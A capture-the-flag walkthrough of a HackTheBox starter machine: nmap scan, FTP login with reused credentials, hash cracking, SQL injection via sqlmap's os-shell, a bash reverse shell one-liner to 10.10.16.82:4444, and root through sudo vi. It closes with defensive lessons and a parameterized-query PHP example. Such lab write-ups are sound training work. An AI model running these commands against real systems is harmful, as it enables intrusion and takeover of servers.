Introduction

This is the third machine in the starter series.

. . .

Scanning & Enumeration

> ------------------------Nmap Results-----------------------------<
--------------------------------------------------------------------
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 00:47 IST
Nmap scan report for 10.10.10.46
Host is up (0.61s latency).
PORT      STATE  SERVICE VERSION
21/tcp    open   ftp     vsftpd 3.0.3
22/tcp    open   ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp    open   http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
14234/tcp closed unknown
17893/tcp closed unknown
18044/tcp closed unknown
18748/tcp closed unknown
23160/tcp closed unknown
24259/tcp closed unknown
42671/tcp closed unknown
48212/tcp closed unknown
50329/tcp closed unknown
54529/tcp closed unknown
55507/tcp closed unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 18044/tcp)
HOP RTT       ADDRESS
1   426.59 ms 10.10.16.1
2   222.85 ms 10.10.10.46

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.08 seconds
--------------------------------------------------------------------

From the results above, let us populate our Service Version Enumeration Table.

Service Version Enumeration Table

FTP Enumeration

Tried anonymous login; it did not work. Before moving on to HTTP, recall that we found a config file on the last machine that gave us credentials, so let us try those here:
ftpuser / mc@F1l3ZilL4

Download the backup.zip file
Cracking the zip file

The archive was password-protected, so we used fcrack to crack it.

Looking at the source code,

Source Code

We found an MD5 hash, 2cb42f8734ea607eefed3b70af13bbd3. Let's try to crack it.

Found the password using Crack Station

The credentials are admin : qwerty789, and we are able to log in.

HTTP Enumeration

Landing Page
Dashboard

Insert a single quote (') in the search box to check whether we have SQL injection.

. . .

Vulnerability Analysis

We notice we have SQL injection. We can use sqlmap to exploit this.

. . .

Exploitation

Capture the search request and save it as req.txt.

Capture the request
sqlmap -r req.txt
sqlmap -r req.txt --dbs

[*] information_schema
[*] pg_catalog
[*] public

I tried enumerating, but at one point it felt like it was never ending. So I used the os-shell argument to get a shell, and then sent back a reverse shell.

sqlmap -r req.txt --os-shell
bash -c 'bash -i >& /dev/tcp/10.10.16.82/4444 0>&1'
. . .

Privesc

We look around for config files, and voilà, we find dashboard.php.

Source code of dashboard

Let us try sudo -l with this password.

User can run vi with sudo privileges

Run sudo vi /etc/postgresql/11/main/pg_hba.conf and then, from inside vi, execute

`:! /bin/bash`

and we get root.

And finally, I was looking for user.txt files when I came across a file.

Shell with root privileges

There was no other user.txt file.

. . .

Summary | TL;DR

  1. Scan ports using Nmap.
  2. Find FTP; log in with the creds found on the last machine.
  3. Log in to the website and find the SQL injection.
  4. Find stored creds for the Postgres user. With sudo -l, find that we can run vi as sudo.
  5. Get a root shell using :! /bin/bash.
. . .

Parting Thoughts

In this machine, we learned the following:

  1. We should always use parameterized queries for database operations in applications.
  2. We should be very careful when granting sudo access to users. Giving the Postgres user sudo access to execute vi or vim could easily lead to privilege escalation.
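
To make the first lesson concrete, here is an added example (not the machine's actual dashboard.php, whose source is not reproduced on this page) showing the string-built PostgreSQL search query that a single quote can break, next to the same query written with a bound parameter. The table and column names, and the connection string, are hypothetical placeholders.

```php
<?php
// Added illustration of the search handler pattern; the real dashboard.php
// is not shown here. Table "cars" and its columns are hypothetical.

// Vulnerable: the user-supplied search term is spliced into the SQL text,
// so a quote character in $search changes the structure of the statement.
function search_cars_vulnerable($conn, string $search)
{
    $sql = "SELECT name, type, fuel, engine FROM cars "
         . "WHERE name ILIKE '%" . $search . "%'";
    return pg_query($conn, $sql);
}

// Hardened: the SQL text is fixed and contains only the placeholder $1.
// The search term is sent as a separate bound parameter, so the database
// always treats it as data, never as part of the query.
function search_cars_safe($conn, string $search)
{
    $sql = "SELECT name, type, fuel, engine FROM cars WHERE name ILIKE $1";
    return pg_query_params($conn, $sql, ['%' . $search . '%']);
}

// Usage sketch; connection details are placeholders.
$conn = pg_connect("host=localhost dbname=DB_PLACEHOLDER user=app password=PASSWORD_PLACEHOLDER");
if ($conn === false) {
    exit("database connection failed\n");
}
$result = search_cars_safe($conn, $_GET['search'] ?? '');
while ($row = pg_fetch_assoc($result)) {
    // Escape on output as well, so a stored value cannot inject HTML.
    echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

With the parameterized version, the same single quote that revealed the injection during enumeration simply becomes part of the search pattern, and sqlmap's test payloads return nothing useful.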

Thank you for reading, please provide your feedback and share it with people who are in need. :)

. . .